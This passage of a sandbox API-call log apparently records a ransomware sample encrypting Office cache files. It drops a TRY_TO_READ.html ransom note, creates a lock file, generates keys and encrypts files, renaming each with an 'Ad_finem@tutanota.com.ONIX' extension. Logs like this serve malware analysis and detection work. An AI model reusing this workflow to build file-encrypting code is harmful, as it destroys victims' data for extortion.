[0068.708] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0068.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.708] GetLastError () returned 0x0 [0068.708] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.709] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.709] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.710] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.710] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.710] CloseHandle (hObject=0x470) returned 1 [0068.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0068.710] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0068.710] CloseHandle (hObject=0x3cc) returned 1 [0068.710] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.711] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x8, wMilliseconds=0x126)) [0068.711] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0068.711] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0068.711] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0068.711] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0068.711] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0068.712] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.712] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43e3f8 [0068.712] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0068.712] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458280 | out: hHeap=0x410000) returned 1 [0068.712] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0068.712] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e8f0 [0068.712] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.713] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0068.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.713] GetLastError () returned 0x0 [0068.713] FindNextFileW (in: hFindFile=0x48e8f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0068.713] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.713] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0068.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.713] GetLastError () returned 0x0 [0068.713] FindNextFileW (in: hFindFile=0x48e8f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0068.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0068.713] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.713] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0068.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.713] GetLastError () returned 0x0 [0068.713] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x474 [0068.714] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.714] LockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x102fcbb, nNumberOfBytesToLockHigh=0x0) returned 1 [0068.714] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.714] ReadFile (in: hFile=0x474, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0068.716] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.716] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.716] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0068.716] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0068.716] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", dwFileAttributes=0x80) returned 1 [0068.717] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 75 [0068.717] GetProcessHeap () returned 0x410000 [0068.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467a20 [0068.717] lstrcpyW (in: lpString1=0x467a20, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" [0068.717] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.717] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16972987) returned 1 [0068.717] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x102fcbb [0068.717] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0068.717] GetProcessHeap () returned 0x410000 [0068.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0068.717] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0068.717] WriteFile (in: hFile=0x474, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0069.060] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0069.061] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0069.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102fcbb) returned 0x3680020 [0069.063] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102fcbb) returned 0x46b0020 [0069.064] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.064] ReadFile (in: hFile=0x474, lpBuffer=0x3680020, nNumberOfBytesToRead=0x102fcbb, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x102fcbb, lpOverlapped=0x0) returned 1 [0070.327] UnlockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x102fcbb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0070.328] CloseHandle (hObject=0x474) returned 1 [0070.604] GetProcessHeap () returned 0x410000 [0070.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0070.604] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0070.606] GetProcessHeap () returned 0x410000 [0070.606] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467a20 | out: hHeap=0x410000) returned 1 [0070.606] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0070.606] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0070.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0070.607] FindNextFileW (in: hFindFile=0x48e8f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0070.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0070.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0070.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0070.609] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0070.610] GetLastError () returned 0x0 [0070.612] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x474 [0070.622] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0070.623] LockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x263e00, nNumberOfBytesToLockHigh=0x0) returned 1 [0070.623] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.623] ReadFile (in: hFile=0x474, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0070.624] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.625] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.625] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0070.625] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0070.625] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", dwFileAttributes=0x80) returned 1 [0070.625] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 76 [0070.625] GetProcessHeap () returned 0x410000 [0070.625] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0070.625] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" [0070.625] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0070.625] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2506240) returned 1 [0070.626] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x263e00 [0070.635] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0070.635] GetProcessHeap () returned 0x410000 [0070.635] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0070.635] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0070.635] WriteFile (in: hFile=0x474, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0070.707] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0070.708] WriteFile (in: hFile=0x474, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0070.710] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x263e00) returned 0x3680020 [0070.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x263e00) returned 0x38f0020 [0070.711] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.711] ReadFile (in: hFile=0x474, lpBuffer=0x3680020, nNumberOfBytesToRead=0x263e00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x263e00, lpOverlapped=0x0) returned 1 [0071.200] UnlockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x263e00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0071.200] CloseHandle (hObject=0x474) returned 1 [0071.236] GetProcessHeap () returned 0x410000 [0071.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0071.236] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0071.238] GetProcessHeap () returned 0x410000 [0071.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0071.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0071.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0071.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0071.238] FindNextFileW (in: hFindFile=0x48e8f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0071.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0071.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0071.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0071.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0071.238] GetLastError () returned 0x0 [0071.239] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x474 [0071.239] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0071.239] LockFile (hFile=0x474, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x61d, nNumberOfBytesToLockHigh=0x0) returned 1 [0071.239] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.239] ReadFile (in: hFile=0x474, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0071.242] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.242] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.243] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0071.243] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0071.243] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", dwFileAttributes=0x80) returned 1 [0071.243] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 76 [0071.243] GetProcessHeap () returned 0x410000 [0071.243] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0071.243] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" [0071.243] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All 